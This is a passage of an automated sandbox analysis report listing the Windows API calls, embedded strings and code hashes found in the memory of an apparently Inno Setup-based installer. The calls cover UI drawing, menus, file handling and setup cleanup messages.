                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$D5550$ActiveHandleModuleRect
                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                          • API String ID: 3275387371-3407710046
                                          • Opcode ID: 9265eb0d5d374d6e5454a4b18053e0e4af1e5ba6544aec4509c430739ed00abd
                                          • Instruction ID: 7fa31d1e0882b40fe014ad80680a7c2db7e1f7962834736ed83b4a6a8dfe5178
                                          • Opcode Fuzzy Hash: 9265eb0d5d374d6e5454a4b18053e0e4af1e5ba6544aec4509c430739ed00abd
                                          • Instruction Fuzzy Hash: 77219F767016256BD710DA699C81F3F73D8EB84724F494A2DF944AB381EA78EC008B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(00000000,00000129,00000000,00000000), ref: 0044D230
                                          • LineDDA.GDI32(?,?,?,?,Function_0004CACC,?), ref: 0044D381
                                          • LineDDA.GDI32(?,?,?,?,Function_0004CACC,?), ref: 0044D3A5
                                          • DrawFrameControl.USER32 ref: 0044D4B4
                                            • Part of subcall function 0041AD28: FillRect.USER32 ref: 0041AD50
                                          • GetTextColor.GDI32(00000000), ref: 0044D5AF
                                          • GetSysColor.USER32(00000011), ref: 0044D5D1
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D5DF
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D609
                                          • OffsetRect.USER32(00000000,00000000,?), ref: 0044D6AA
                                          • InflateRect.USER32(?,00000001,00000001), ref: 0044D77A
                                          • SetTextColor.GDI32(00000000,?), ref: 0044D795
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Color$Text$Rect$Line$ControlDrawFillFrameInflateMessageOffsetSend
                                          • String ID:
                                          • API String ID: 3787931423-0
                                          • Opcode ID: 668120ce3816169344680d3d91ae975889dad7cdb0900ea9c3bddfdc5a481bf7
                                          • Instruction ID: 06a95b64524c3b1db15d8e3d88035710d567d3bd60866f0deb3bf5ae9595a7e7
                                          • Opcode Fuzzy Hash: 668120ce3816169344680d3d91ae975889dad7cdb0900ea9c3bddfdc5a481bf7
                                          • Instruction Fuzzy Hash: D8122C74E00248AFEB01DFA8C985BEEB7F5AF49304F1445AAE504E7352D778AE41CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046ACC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ChangeNotify
                                          • String ID: .lnk$.pif$Desktop.ini$Filename: %s$target.lnk${group}\
                                          • API String ID: 3893256919-3966328851
                                          • Opcode ID: 23d990d7a20fecb089370616dcf94d7f298d8f09327a709e35c781f1c6f83dfe
                                          • Instruction ID: 9837c8abb0defc92026b78f619cda978b5db0580f9f6f21c6430ac3894e01728
                                          • Opcode Fuzzy Hash: 23d990d7a20fecb089370616dcf94d7f298d8f09327a709e35c781f1c6f83dfe
                                          • Instruction Fuzzy Hash: 19A15374A00109AFDB01EF99C482BEEB7F4AF08304F50816AF814B7391D779AE45CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          • FreeLibrary.KERNEL32(10000000), ref: 0047665E
                                          • FreeLibrary.KERNEL32(00000000), ref: 00476672
                                          • SendMessageA.USER32(?,00000496,00002710,00000000), ref: 0047672B
                                          Strings
                                          • Restarting Windows., xrefs: 00476706
                                          • Failed to remove temporary directory: , xrefs: 004766B2
                                          • GetCustomSetupExitCode, xrefs: 00476505
                                          • DeinitializeSetup, xrefs: 00476561
                                          • Deinitializing Setup., xrefs: 004764C6
                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 004766E7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FreeLibrary$LocalMessageSendTime
                                          • String ID: DeinitializeSetup$Deinitializing Setup.$Failed to remove temporary directory: $GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                          • API String ID: 2162613394-2206919510
                                          • Opcode ID: 3c5015a4960e728826c0c0e78e0993cbc173cb30346a3ef9b11c5ccad035f7df
                                          • Instruction ID: 88710889204b450ddef80d4bb5843ce3062f5c5781215f01ea294c2a2cd58e68
                                          • Opcode Fuzzy Hash: 3c5015a4960e728826c0c0e78e0993cbc173cb30346a3ef9b11c5ccad035f7df
                                          • Instruction Fuzzy Hash: 55612630600700AFDB14EF66D895B9A7BE9EB06308F11C4BBF818973A1CB789844CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00455075,?,?,?,?), ref: 00454F38
                                          • 6CAD5550.KERNEL32(00000000,OLEAUT32.DLL,UnRegisterTypeLib,00000000,00455075,?,?,?,?), ref: 00454F3E
                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00454F8B
                                            • Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550ErrorHandleLastLoadModuleType
                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                          • API String ID: 1267307030-2711329623
                                          • Opcode ID: aed263ed5648d535ed8f6f434b80fa5aa92fc9739765fb6e89cd270ac0a17f99
                                          • Instruction ID: 0a1100805ea1f579c8d6b43e9e4a1f9952dea1fbb95a38e61b6d9b86ecb1b516
                                          • Opcode Fuzzy Hash: aed263ed5648d535ed8f6f434b80fa5aa92fc9739765fb6e89cd270ac0a17f99
                                          • Instruction Fuzzy Hash: 9431A371700A04AFC711EFAACC61D6BB7BDEB89B157108466FD04D7692DA38DC0486A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001,00000000,00000002,00000000,00475FEC), ref: 0042E2FD
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001,00000000,00000002,00000000,00475FEC), ref: 0042E303
                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E3D9,?,?,00000000,00000000,0047581C,?,00000001), ref: 0042E351
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD5550HandleModule
                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                          • API String ID: 2067295843-2401316094
                                          • Opcode ID: eac289779dc9a35405dacf305eb194efd7d16bf3728e6d0d51f92599c330f9e5
                                          • Instruction ID: 2ffba39c9ec1f6b7cffe41910bb2280be0d998a6ad9fce04057ee52685a60889
                                          • Opcode Fuzzy Hash: eac289779dc9a35405dacf305eb194efd7d16bf3728e6d0d51f92599c330f9e5
                                          • Instruction Fuzzy Hash: 12215830B04215ABDB10EAA3DC91B9F77B8EB04305F90447BA900E7291DB78DE01CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                          • String ID:
                                          • API String ID: 375863564-0
                                          • Opcode ID: 964d93497028cbc6991c5c4536bdc5add608c04f7d813be7827ebd80889c79e1
                                          • Instruction ID: da30a3232c1dc10d551ab5d1fc10539b4d507e23bbc5398dd1f758c738a3ed68
                                          • Opcode Fuzzy Hash: 964d93497028cbc6991c5c4536bdc5add608c04f7d813be7827ebd80889c79e1
                                          • Instruction Fuzzy Hash: A6513C71204645AFCB50EF29C984B9B77E8AF48314F15566AFD48CB287C738EC81CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404C96
                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CBA
                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404CD6
                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404CF7
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404D20
                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404D2A
                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404D4A
                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404D61
                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404D7C
                                          • GetLastError.KERNEL32(000000F5), ref: 00404D96
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: File$HandlePointer$CloseErrorLastReadSizeType
                                          • String ID:
                                          • API String ID: 2587015848-0
                                          • Opcode ID: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
                                          • Instruction ID: 206bcdb747724065788a6a6a215919135cebaaf405beceec5406885cc449240e
                                          • Opcode Fuzzy Hash: 32fbc3d591d887db1daa96df7588f8d0b8ed6a028886d61b7680b13e569ddf3c
                                          • Instruction Fuzzy Hash: 814180B01057009AE7306F248809B3775E5AFC1764F248A3FE2A6BA6E0E77DE845875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMenu.USER32(00000000,00000000), ref: 004222FB
                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422319
                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422326
                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422333
                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422340
                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042234D
                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042235A
                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422367
                                          • EnableMenuItem.USER32 ref: 00422385
                                          • EnableMenuItem.USER32 ref: 004223A1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$EnableItem$System
                                          • String ID:
                                          • API String ID: 3985193851-0
                                          • Opcode ID: a71815bfce3839e5d59f0b64983f550f02594c27ccd0ca70a59ab461335a7683
                                          • Instruction ID: 69e16c91d3084d14181d37bcb75724531617602d3fcf40d776552ae4b11e6cc4
                                          • Opcode Fuzzy Hash: a71815bfce3839e5d59f0b64983f550f02594c27ccd0ca70a59ab461335a7683
                                          • Instruction Fuzzy Hash: 622121703847057AEB21DB25CD8FF9A7AD8AB04718F0444A5BA447F2D3C7FDAA408A58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC
                                          • SHGetMalloc.SHELL32(?), ref: 0045BE07
                                          • GetActiveWindow.USER32 ref: 0045BE6B
                                          • CoInitialize.OLE32(00000000), ref: 0045BE7F
                                          • SHBrowseForFolder.SHELL32(?), ref: 0045BE96
                                          • 76E2F460.OLE32(0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BEAB
                                          • SetActiveWindow.USER32(?,0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BEC1
                                          • SetActiveWindow.USER32(?,?,0045BED7,00000000,?,?,?,?,?,00000000,0045BF5B), ref: 0045BECA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ActiveWindow$BrowseCharF460FolderInitializeMallocPrev
                                          • String ID: A
                                          • API String ID: 917524086-3554254475
                                          • Opcode ID: 0cb04e95cc2b8f3418b7ed81ca2b8f6428beee4110c3bfc39c51b83993a3b858
                                          • Instruction ID: 40f59b17f8b227a8e47d7ce9633a3b39aa69965a961231048fa4038206e478c7
                                          • Opcode Fuzzy Hash: 0cb04e95cc2b8f3418b7ed81ca2b8f6428beee4110c3bfc39c51b83993a3b858
                                          • Instruction Fuzzy Hash: 01310271D00308AFDB10EFA6D84669EBBF4EF09704F51446EF914E7252D7785A048B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5550.KERNEL32(00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DCD
                                          • 6CAD5550.KERNEL32(00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DDD
                                          • 6CAD5550.KERNEL32(00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DED
                                          • 6CAD5550.KERNEL32(00000000,inflateReset,00000000,inflateEnd,00000000,inflate,00000000,inflateInit_,?,00474532,00000000,00474575), ref: 00459DFD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550
                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                          • API String ID: 183293030-3516654456
                                          • Opcode ID: 08be8e6723b555c98a90567aa473cb96b3cd92cfe30f32e8e3ddb5f49466edf1
                                          • Instruction ID: 593e9f5ebda3a002a962f724245eb82e3e35f3a9e9cc54a335af02b5c8b8f83e
                                          • Opcode Fuzzy Hash: 08be8e6723b555c98a90567aa473cb96b3cd92cfe30f32e8e3ddb5f49466edf1
                                          • Instruction Fuzzy Hash: 210121B0D40740DED724DF229C4676B3B95A78A306F14943BB807516E6D77C0C49CE1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetBkColor.GDI32(?,00000000), ref: 0041AA81
                                          • 72E697E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AABB
                                          • SetBkColor.GDI32(?,?), ref: 0041AAD0
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AB1A
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AB25
                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AB35
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AB74
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AB7E
                                          • SetBkColor.GDI32(00000000,?), ref: 0041AB8B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Color$StretchText$E697
                                          • String ID:
                                          • API String ID: 2665930546-0
                                          • Opcode ID: c56cf52689fd51e5bd55cf85186bda95c83bec91cc31fa4deaf11f1e19070ac1
                                          • Instruction ID: ee86f0750f3c85e4cb2c78ceea8e401274d7fa79e019d7e0a2921028e538c732
                                          • Opcode Fuzzy Hash: c56cf52689fd51e5bd55cf85186bda95c83bec91cc31fa4deaf11f1e19070ac1
                                          • Instruction Fuzzy Hash: 5761C4B5A00115AFCB40EFADD985E9EB7F8BF08304B1085A9F518DB256C738ED40CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044D0DD
                                          • GetSysColor.USER32(00000014), ref: 0044D0E4
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D0FC
                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D125
                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D12F
                                          • GetSysColor.USER32(00000010), ref: 0044D136
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D14E
                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D177
                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1A2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Text$Color$Draw$OffsetRect
                                          • String ID:
                                          • API String ID: 1005981011-0
                                          • Opcode ID: 33048d6fe813da3bf702f19ff274443e3f4d5eee3abaf323698d31b78f6c996e
                                          • Instruction ID: c739dd69d65c9e7912bbc932d9ac453e2b825e6c1c1415afdccf92aa0735ef3c
                                          • Opcode Fuzzy Hash: 33048d6fe813da3bf702f19ff274443e3f4d5eee3abaf323698d31b78f6c996e
                                          • Instruction Fuzzy Hash: 4921CCB42015007FC710FB6ECC9AE9B7BDC9F09359B01857AB958EB393C678DD448668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFocus.USER32 ref: 0041B80D
                                          • 72E5AC50.USER32(?), ref: 0041B819
                                          • 72E5B410.GDI32(00000000,?,00000000,00000000,0041B8E4,?,?), ref: 0041B84E
                                          • 72E5B150.GDI32(00000000,00000000,?,00000000,00000000,0041B8E4,?,?), ref: 0041B85A
                                          • 72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B8C2,?,00000000,0041B8E4,?,?), ref: 0041B888
                                          • 72E5B410.GDI32(00000000,00000000,00000000,0041B8C9,?,?,00000000,00000000,0041B8C2,?,00000000,0041B8E4,?,?), ref: 0041B8BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B410$B150Focus
                                          • String ID: [rG
                                          • API String ID: 1979529269-1780078340
                                          • Opcode ID: a8189996918be81ac9f98b6a3fba9c441f062151ba4384118a9bc054385206b8
                                          • Instruction ID: f3c935502b2b24554daab9b13747c211e985ab90b43413e07b92cff4b62194e0
                                          • Opcode Fuzzy Hash: a8189996918be81ac9f98b6a3fba9c441f062151ba4384118a9bc054385206b8
                                          • Instruction Fuzzy Hash: 61512D70A00208AFCB11DFA9C891AEEBBF9EF49704F114066F504A7351D7789D81CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFocus.USER32 ref: 0041BADF
                                          • 72E5AC50.USER32(?), ref: 0041BAEB
                                          • 72E5B410.GDI32(00000000,?,00000000,00000000,0041BBB1,?,?), ref: 0041BB25
                                          • 72E5B150.GDI32(00000000,00000000,?,00000000,00000000,0041BBB1,?,?), ref: 0041BB31
                                          • 72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BB8F,?,00000000,0041BBB1,?,?), ref: 0041BB55
                                          • 72E5B410.GDI32(00000000,00000000,00000000,0041BB96,?,?,00000000,00000000,0041BB8F,?,00000000,0041BBB1,?,?), ref: 0041BB89
                                          Strings
